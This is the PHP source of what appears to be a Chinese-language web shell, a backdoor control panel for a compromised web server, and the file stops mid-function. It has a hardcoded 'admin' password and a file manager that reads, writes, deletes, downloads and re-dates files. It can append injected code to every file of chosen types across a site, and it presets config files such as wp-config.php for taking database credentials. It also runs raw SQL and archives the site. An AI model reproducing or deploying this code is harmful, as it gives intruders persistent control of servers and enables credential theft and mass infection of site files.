<?php
$password='admin';  //登录密码
error_reporting(0);
date_default_timezone_set('UTC');
ob_start();
define('myaddress', $_SERVER['SCRIPT_FILENAME']);
define('postpass', $password);

function Exec_Run(){

    
} 

function css_img($img)
{
    $images = array(
        "exe" =>
            "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" .
            "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" .
            "xhIAOw==",
        "dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" .
            "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
        "txt" =>
            "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" .
            "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" .
            "UpPWG3Ig6Hq/XmRjuZwkAAA7",
        "html" =>
            "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" .
            "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" .
            "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" .
            "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" .
            "ADs=",
        "js" =>
            "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" .
            "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" .
            "a00AjYYBbc/o9HjNniUAADs=",
        "xml" =>
            "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" .
            "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" .
            "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" .
            "IQA7",
        "mp3" =>
            "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" .
            "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" .
            "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
        "img" =>
            "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" .
            "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" .
            "FxEAOw==",
        "title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" .
            "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" .
            "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
        "rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/" .
            "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" .
            "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" .
            "aNOmRcjVj02tPxPCzfkvIAA7"
    );
    header('Content-type: image/gif');
    echo base64_decode($images[$img]);
    die();
}

function css_showimg($file)
{
    $it = substr($file, -3);
    switch ($it) {
        case "jpg":
        case "gif":
        case "bmp":
        case "png":
        case "ico":
            return 'img';
            break;
        case "htm":
        case "tml":
            return 'html';
            break;
        case "exe":
        case "com":
            return 'exe';
            break;
        case "xml":
        case "doc":
            return 'xml';
            break;
        case ".js":
        case "vbs":
            return 'js';
            break;
        case "mp3":
        case "wma":
        case "wav":
        case "swf":
        case ".rm":
        case "avi":
        case "mp4":
        case "mvb":
            return 'mp3';
            break;
        case "rar":
        case "tar":
        case ".gz":
        case "zip":
        case "iso":
            return 'rar';
            break;
        default:
            return 'txt';
            break;
    }
}

function html_n($data)
{
    echo "$data\n";
}

function muma($filecode, $filetype)
{
    $dim = array(
        "php" => array("eval(", "exec("),
        "asp" => array("WScript.Shell", "execute(", "createtextfile("),
        "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"),
        "jsp" => array("runtime.exec(")
    );
    foreach ($dim[$filetype] as $code) {
        if (stristr($filecode, $code)) return true;
    }
}

function debug($file, $ftype)
{
    $type = explode('|', $ftype);
    foreach ($type as $i) {
        if (stristr($file, $i)) return true;
    }
}

function str_path($path)
{
    return str_replace('//', '/', $path);
}

function msg($msg)
{
    die("<script>window.alert('" . $msg . "');history.go(-1);</script>");
}

function uppath($nowpath)
{
    $nowpath = str_replace('\\', '/', dirname($nowpath));
    return urlencode($nowpath);
}

function html_ta($url, $name)
{
    html_n("<a href=\"$url\" target=\"_blank\">$name</a>");
}

function html_a($url, $name, $where = '')
{
    html_n("<a href=\"$url\" $where>$name</a> ");
}

function html_img($url)
{
    html_n("<img src=\"?img=$url\" border=0>");
}

function back()
{
    html_n("<input type='button' value='返回' onclick='history.back();'>");
}

function html_radio($namei, $namet, $v1, $v2)
{
    html_n('<input type="radio" name="return" value="' . $v1 . '" checked>' . $namei);
    html_n('<input type="radio" name="return" value="' . $v2 . '">' . $namet . '<br><br>');
}

function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false)
{
    if ($mode) {
        html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");
    } else {
        html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">");
    }
}

function html_text($name, $cols, $rows, $value = '')
{
    html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>");
}

function html_select($array, $mode = '', $change = '', $name = 'class')
{
    html_n("<select name=$name $change>");
    foreach ($array as $name => $value) {
        if ($name == $mode) {
            html_n("<option value=\"$name\" selected>$value</option>");
        } else {
            html_n("<option value=\"$name\">$value</option>");
        }
    }
    html_n("</select>");
}

function html_font($color, $size, $name)
{
    html_n("<font color=\"$color\" size=\"$size\">$name</font>");
}

function File_Str($string)
{
    return str_replace('//', '/', str_replace('\\', '/', $string));
}

function File_Write($filename, $filecode, $filemode)
{
    $key = true;
    $handle = @fopen($filename, $filemode);
    if (!@fwrite($handle, $filecode)) {
        @chmod($filename, 0666);
        $key = @fwrite($handle, $filecode) ? true : false;
    }
    @fclose($handle);
    return $key;
}

function File_Mode()
{
    if (isset($_SERVER['DOCUMENT_ROOT'])) {
        return str_replace('//', '/', str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']));
    }
    $all=$_SERVER['SCRIPT_FILENAME'];
    $ban=$_SERVER['SCRIPT_NAME'];
    $file= basename($ban);
    $ban=substr($ban,0,strlen($ban) - strlen($file));
    if(substr($ban,-1)=="/")
        $ban=substr($ban,0,strlen($ban)-1);
    $ban= str_replace('//', '/', str_replace('\\', '/', $ban));
    $all= str_replace('//', '/', str_replace('\\', '/', $all));
    if($ban=="")
        $index= strripos($all,"/".$file);
    else
        $index= strripos($all,$ban);
    $all= substr($all,0,$index);
    return $all;
}

function GetFileOwner($File)
{
    if (PATH_SEPARATOR == ':') {
        if (function_exists('posix_getpwuid')) {
            $File = posix_getpwuid(fileowner($File));
        }
        return $File['name'];
    }
}

function GetFileGroup($File)
{
    if (PATH_SEPARATOR == ':') {
        if (function_exists('posix_getgrgid')) {
            $File = posix_getgrgid(filegroup($File));
        }
        return $File['name'];
    }
}

function File_Size($size)
{
    $kb = 1024;
    $mb = 1024 * $kb;
    $gb = 1024 * $mb;
    $tb = 1024 * $gb;
    $db = 1024 * $tb;
    if ($size < $kb) {
        return $size . " B";
    } else if ($size < $mb) {
        return round($size / $kb, 2) . " K";
    } else if ($size < $gb) {
        return round($size / $mb, 2) . " M";
    } else if ($size < $tb) {
        return round($size / $gb, 2) . " G";
    } else if ($size < $db) {
        return round($size / $tb, 2) . " T";
    } else {
        return round($size / $db, 2) . " ST";
    }
}

function File_Read($filename)
{
    $handle = @fopen($filename, "rb");
    $filecode = @fread($handle, @filesize($filename));
    @fclose($handle);
    return $filecode;
}

function array_iconv($data, $output = 'utf-8')
{
    $encode_arr = array('UTF-8', 'ASCII', 'GBK', 'GB2312', 'BIG5', 'JIS', 'eucjp-win', 'sjis-win', 'EUC-JP');
    $encoded = mb_detect_encoding($data, $encode_arr);

    if (!is_array($data)) {
        return mb_convert_encoding($data, $output, $encoded);
    } else {
        foreach ($data as $key => $val) {
            $key = array_iconv($key, $output);
            if (is_array($val)) {
                $data[$key] = array_iconv($val, $output);
            } else {
                $data[$key] = mb_convert_encoding($data, $output, $encoded);
            }
        }
        return $data;
    }
}

function Mysql_Len($data, $len)
{
    if (strlen($data) < $len) return $data;
    return substr_replace($data, '...', $len);
}

function css_js($num, $code = '')
{
    html_n('<script language="javascript">');
    if ($num == "1") {
        $str = <<<end
function rusurechk(msg,url){
		smsg = "FileName:[" + msg + "]\\nPlease Input New File:";
		re = prompt(smsg,msg);
		if (re){
			url = url + re;
			window.location = url;
		}
	}
	function rusuredel(msg,url){
		smsg = "Do You Suer Delete [" + msg + "] ?";
		if(confirm(smsg)){
			URL = url + msg;
			window.location = url;
		}
	}
	function Delok(msg,gourl)
	{
		smsg = "确定要删除[" + unescape(msg) + "]吗?";
		if(confirm(smsg))
		{
			if(gourl == 'b')
			{
				document.getElementById('actall').value = escape(gourl);
				document.getElementById('fileall').submit();
			}
			else window.location = gourl;
		}
	}
	function SubmitAttran(msg,ffile,txt,actid)
	{
		re = prompt(msg,unescape(txt));
		if(re)
		{
			document.getElementById('attam').value = actid;
			document.getElementById('file').value = ffile;
			document.getElementById('inver').value = re;
			document.getElementById('fileall').submit();
		}
	}
	function CheckAll(form)
	{
		for(var i=0;i<form.elements.length;i++)
		{
			var e = form.elements[i];
			if (e.name != 'chkall')
			e.checked = form.chkall.checked;
		}
	}
	function CheckDate(msg,gourl)
	{
		smsg = "当前文件时间:[" + msg + "]";
		re = prompt(smsg,msg);
		if(re)
		{
			var url = gourl + re;
			var reg = /^(\d{1,4})(-|\/)(\d{1,2})\\2(\d{1,2}) (\d{1,2}):(\d{1,2}):(\d{1,2})$/;
			var r = re.match(reg);
			if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}
			else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
		}
	}
	function SubmitUrl(msg,txt,actid)
	{
		re = prompt(msg,unescape(txt));
		if(re)
		{
			document.getElementById('actall').value = actid;
			document.getElementById('inver').value = escape(re);
			document.getElementById('fileall').submit();
		}
	}
end;
        html_n($str);
    } elseif ($num == "2") {
        $str = <<<end
var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
	var txt, i, found;
	if(str == "")return false;
	if(NS4){
		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
		if(n == 0) alert(str + " ... Not-Find")
	}
	if(IE4){
		txt = win.document.body.createTextRange();
		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
			txt.moveStart("character", 1);
			txt.moveEnd("textedit")
		}
		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
	}
	return false
}
function CheckDate(){
	var re = document.getElementById('mtime').value;
	var reg = /^(\d{1,4})(-|\/)(\d{1,2})\\2(\d{1,2}) (\d{1,2}):(\d{1,2}):(\d{1,2})$/;
	var r = re.match(reg);
	var t = document.getElementById('charset').value;
    t = t.toLowerCase();
	if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}
	else{document.getElementById('newfile').value = base64encode(document.getElementById('newfile').value);
	if(t=="utf-8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}
end;

        html_n($str);
        if (substr(PHP_VERSION, 0, 1) >= 5) {
            $str = <<<end
if(t=="gbk" || t=="gb2312"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}
end;
            html_n($str);
        }
        $str = <<<end
document.getElementById('editor').submit();}
}
end;
        html_n($str);
    } elseif ($num == "4") {
        $str = <<<end
function Fulll(i){
   if(i==0){
     return false;
   }
  Str = new Array(10);
	Str[1] = "config.inc.php";
	Str[2] = "config.inc.php";
	Str[3] = "config_base.php";
	Str[4] = "config.inc.php";
	Str[5] = "config.php";
	Str[6] = "wp-config.php";
	Str[7] = "config.php";
	Str[8] = "mysql.php";
	Str[9] = "common.inc.php";
	Str[10] = "databases.php";
	sform.code.value = Str[i];
  return true;
  }
end;
        html_n($str);
    }
    html_n("</script>");
}

function css_left()
{
    $str = <<<end
<style type="text/css">
	.menu{width:152px;margin-left:auto;margin-right:auto;}
	.menu dl{margin-top:2px;}
	.menu dl dt{top left repeat-x;}
	.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
	text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
	.menu dl dt a:hover{color:#FFFFCC;}
	.menu dl dd ul{list-style:none;}
	.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
	background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
	border-style:solid;border-width:1px;}
	.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
	</STYLE>
end;
    html_n($str);
    $str = <<<end
<script language="javascript">
	function getObject(objectId){
	 if(document.getElementById && document.getElementById(objectId)) {
	 return document.getElementById(objectId);
	 }
	 else if (document.all && document.all(objectId)) {
	 return document.all(objectId);
	 }
	 else if (document.layers && document.layers[objectId]) {
	 return document.layers[objectId];
	 }
	 else {
	 return false;
	 }
	}
	function showHide(objname){
	  var obj = getObject(objname);
	    if(obj.style.display == "none"){
			obj.style.display = "block";
		}else{
			obj.style.display = "none";
		}
	}
	</script><div class="menu">
end;
    html_n($str);
}

function css_main()
{
    $str = <<<end
<style type="text/css">
	*{padding:0px;margin:0px;}
	body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}
	body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;
	height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}
	input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}
    a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
	.actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
	</STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
	<table width="85%" border=0 bgcolor="#555555" align="center">
end;
    html_n($str);
}

function css_foot()
{
    html_n("</td></tr></table>");
}

function do_write($file, $t, $text)
{
    $key = true;
    $handle = @fopen($file, $t);
    if ($text != "") {
        if (!@fwrite($handle, $text)) {
            @chmod($file, 0666);
            $key = @fwrite($handle, $text) ? true : false;
        }
    }
    @fclose($handle);
    return $key;
}

function do_show($filepath)
{
    $show = array();
    $dir = dir($filepath);
    while ($file = $dir->read()) {
        if ($file == '.' or $file == '..') continue;
        $files = str_path($filepath . '/' . $file);
        $show[] = $files;
    }
    $dir->close();
    return $show;
}

function delDirAndFile($path)
{
    if (is_dir($path)) {
        $file_list = scandir($path);
        foreach ($file_list as $file) {
            if ($file != '.' && $file != '..') {
                delDirAndFile($path . '/' . $file);//递归删除
            }
        }
        @rmdir($path);//删除空目录
    } else if (is_file($path)) {
        @chmod($path, 0777);
        @unlink($path);//删除文件
    }
}

function do_showsql($query, $conn)
{
    $result = @mysql_query($query, $conn);
    html_n('<br><br><textarea cols="70" rows="15">');
    while ($row = @mysql_fetch_array($result)) {
        for ($i = 0; $i < @mysql_num_fields($result); $i++) {
            html_n(htmlspecialchars($row[$i]));
        }
    }
    html_n('</textarea>');
}

function hmlogin()
{
    $domain = $_SERVER ['HTTP_HOST'];
    if (strpos($domain, "0.0") !== false || strpos($domain, "192.168.") !== false || strpos($domain, "localhost") !== false) {
        echo "<meta http-equiv='refresh' content='0'>";
    } else {
        echo "<meta http-equiv='refresh' content='0'>";
    }
}

function do_down($fd)
{
    if (!@file_exists($fd)) msg("下载文件不存在");
    $fileinfo = pathinfo($fd);
    header("Content-type: application/x-" . $fileinfo['extension']);
    header("Content-Disposition: attachment; filename=" . $fileinfo['basename']);
    header("Content-Length: " . filesize($fd));
    @readfile($fd);
    exit;
}

function do_download($filecode, $file)
{
    header("Content-type: application/unknown");
    header("Accept-Ranges: bytes");
    header("Content-length: " . strlen($filecode));
    header("Content-Disposition: attachment; filename=" . $file . ";");
    echo $filecode;
    exit;
}

function TestUtf8($text)
{
    if (strlen($text) < 3) return false;
    $lastch = 0;
    $begin = 0;
    $BOM = true;
    $BOMchs = array(0xEF, 0xBB, 0xBF);
    $good = 0;
    $bad = 0;
    $notAscii = 0;
    for ($i = 0; $i < strlen($text); $i++) {
        $ch = ord($text[$i]);
        if ($begin < 3) {
            $BOM = ($BOMchs[$begin] == $ch);
            $begin += 1;
            continue;
        }
        if ($begin == 4 && $BOM) break;
        if ($ch >= 0x80) $notAscii++;
        if (($ch & 0xC0) == 0x80) {
            if (($lastch & 0xC0) == 0xC0) {
                $good += 1;
            } else if (($lastch & 0x80) == 0) {
                $bad += 1;
            }
        } else if (($lastch & 0xC0) == 0xC0) {
            $bad += 1;
        }
        $lastch = $ch;
    }
    if ($begin == 4 && $BOM) {
        return 2;
    } else if ($notAscii == 0) {
        return 1;
    } else if ($good >= $bad) {
        return 2;
    } else {
        return 0;
    }
}

function Info_Cfg($varname)
{
    switch ($result = get_cfg_var($varname)) {
        case 0:
            return "No";
            break;
        case 1:
            return "Yes";
            break;
        default:
            return $result;
            break;
    }
}

function Info_Fun($funName)
{
    return (false !== function_exists($funName)) ? "Yes" : "No";
}

function do_passreturn($dir, $code, $type, $bool, $filetype = '', $shell = my_shell)
{
    $show = do_show($dir);
    foreach ($show as $files) {
        if (is_dir($files) && $bool) {
            do_passreturn($files, $code, $type, $bool, $filetype, $shell);
        } else {
            if ($files == $shell) continue;
            switch ($type) {
                case "guama":
                    if (debug($files, $filetype)) {
                        do_write($files, "ab", "\n" . $code) ? html_n("成功--> " . $files . "<br>") : html_n("失败--> " . $files . "<br>");
                    }
                    break;
                case "qingma":
                    $filecode = @implode('', @file($files));
                    if (stristr($filecode, $code)) {
                        $newcode = str_replace($code, '', $filecode);
                        do_write($files, "wb", $newcode) ? html_n("成功--> " . $files . "<br>") : html_n("失败--> " . $files . "<br>");
                    }
                    break;
                case "tihuan":
                    $filecode = @implode('', @file($files));
                    if (stristr($filecode, $code)) {
                        $newcode = str_replace($code, $filetype, $filecode);
                        do_write($files, "wb", $newcode) ? html_n("成功--> " . $files . "<br>") : html_n("失败--> " . $files . "<br>");
                    }
                    break;
                case "scanfile":
                    $file = explode('/', $files);
                    if (stristr($file[count($file) - 1], $code)) {
                        html_a("?eanver=editr&p=" . $files, $files);
                        echo '<br>';
                    }
                    break;
                case "scancode":
                    $filecode = @implode('', @file($files));
                    if (stristr($filecode, $code)) {
                        html_a("?eanver=editr&p=" . $files, $files);
                        echo '<br>';
                    }
                    break;
                case "scanphp":
                    $fileinfo = pathinfo($files);
                    if ($fileinfo['extension'] == $code) {
                        $filecode = @implode('', @file($files));
                        if (muma($filecode, $code)) {
                            html_a("?eanver=editr&p=" . urlencode($files), "编辑");
                            html_a("?eanver=del&p=" . urlencode($files), "删除");
                            echo $files . '<br>';
                        }
                    }
                    break;
            }
        }
    }
}

class PHPzip
{

    var $file_count = 0;
    var $datastr_len = 0;
    var $dirstr_len = 0;
    var $filedata = '';
    var $gzfilename;
    var $fp;
    var $dirstr = '';

    function unix2DosTime($unixtime = 0)
    {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

        if ($timearray['year'] < 1980) {
            $timearray['year'] = 1980;
            $timearray['mon'] = 1;
            $timearray['mday'] = 1;
            $timearray['hours'] = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }

        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
        ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }

    function startfile($path = 'wwwroot.zip')
    {
        $this->gzfilename = $path;
        if ($this->fp = @fopen($this->gzfilename, "w")) {
            return true;
        }
        return false;
    }

    function addfile($data, $name)
    {
        $name = str_replace('\\', '/', $name);

        if (strrchr($name, '/') == '/') return $this->adddir($name);

        $dtime = dechex($this->unix2DosTime());
        $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');
        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        $c_len = strlen($zdata);
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);

        $datastr = "\x50\x4b\x03\x04";
        $datastr .= "\x14\x00";
        $datastr .= "\x00\x00";
        $datastr .= "\x08\x00";
        $datastr .= $hexdtime;
        $datastr .= pack('V', $crc);
        $datastr .= pack('V', $c_len);
        $datastr .= pack('V', $unc_len);
        $datastr .= pack('v', strlen($name));
        $datastr .= pack('v', 0);
        $datastr .= $name;
        $datastr .= $zdata;
        $datastr .= pack('V', $crc);
        $datastr .= pack('V', $c_len);
        $datastr .= pack('V', $unc_len);


        fwrite($this->fp, $datastr);
        $my_datastr_len = strlen($datastr);
        unset($datastr);

        $dirstr = "\x50\x4b\x01\x02";
        $dirstr .= "\x00\x00";
        $dirstr .= "\x14\x00";
        $dirstr .= "\x00\x00";
        $dirstr .= "\x08\x00";
        $dirstr .= $hexdtime;
        $dirstr .= pack('V', $crc);
        $dirstr .= pack('V', $c_len);
        $dirstr .= pack('V', $unc_len);
        $dirstr .= pack('v', strlen($name));
        $dirstr .= pack('v', 0);
        $dirstr .= pack('v', 0);
        $dirstr .= pack('v', 0);
        $dirstr .= pack('v', 0);
        $dirstr .= pack('V', 32);
        $dirstr .= pack('V', $this->datastr_len);
        $dirstr .= $name;

        $this->dirstr .= $dirstr;

        $this->file_count++;
        $this->dirstr_len += strlen($dirstr);
        $this->datastr_len += $my_datastr_len;
    }

    function adddir($name)
    {
        $name = str_replace("\\", "/", $name);
        $datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";

        $datastr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name));
        $datastr .= pack("v", 0) . $name . pack("V", 0) . pack("V", 0) . pack("V", 0);

        fwrite($this->fp, $datastr);
        $my_datastr_len = strlen($datastr);
        unset($datastr);

        $dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
        $dirstr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name));
        $dirstr .= pack("v", 0) . pack("v", 0) . pack("v", 0) . pack("v", 0);
        $dirstr .= pack("V", 16) . pack("V", $this->datastr_len) . $name;

        $this->dirstr .= $dirstr;

        $this->file_count++;
        $this->dirstr_len += strlen($dirstr);
        $this->datastr_len += $my_datastr_len;
    }

    function createfile()
    {
        $endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
            pack('v', $this->file_count) .
            pack('v', $this->file_count) .
            pack('V', $this->dirstr_len) .
            pack('V', $this->datastr_len) .
            "\x00\x00";

        fwrite($this->fp, $this->dirstr . $endstr);
        fclose($this->fp);
    }
}

class eanver
{
    var $out = '';

    function __construct($dir)
    {
        if (@function_exists('gzcompress')) {
            if (count($dir) > 0) {
                foreach ($dir as $file) {
                    if (is_file($file)) {
                        $filecode = implode('', @file($file));
                        if (is_array($dir)) $file = basename($file);
                        $this->filezip($filecode, $file);
                    }
                }
                $this->out = $this->packfile();
            }
            return true;
        } else return false;
    }

    var $datasec = array();
    var $ctrl_dir = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset = 0;

    function at($atunix = 0)
    {
        $unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
        if ($unixarr['year'] < 1980) {
            $unixarr['year'] = 1980;
            $unixarr['mon'] = 1;
            $unixarr['mday'] = 1;
            $unixarr['hours'] = 0;
            $unixarr['minutes'] = 0;
            $unixarr['seconds'] = 0;
        }
        return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) |
        ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
    }

    function filezip($data, $name, $time = 0)
    {
        $name = str_replace('\\', '/', $name);
        $dtime = dechex($this->at($time));
        $hexdtime = '\x' . $dtime[6] . $dtime[7]
            . '\x' . $dtime[4] . $dtime[5]
            . '\x' . $dtime[2] . $dtime[3]
            . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');
        $fr = "\x50\x4b\x03\x04";
        $fr .= "\x14\x00";
        $fr .= "\x00\x00";
        $fr .= "\x08\x00";
        $fr .= $hexdtime;
        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        $c_len = strlen($zdata);
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $fr .= pack('V', $crc);
        $fr .= pack('V', $c_len);
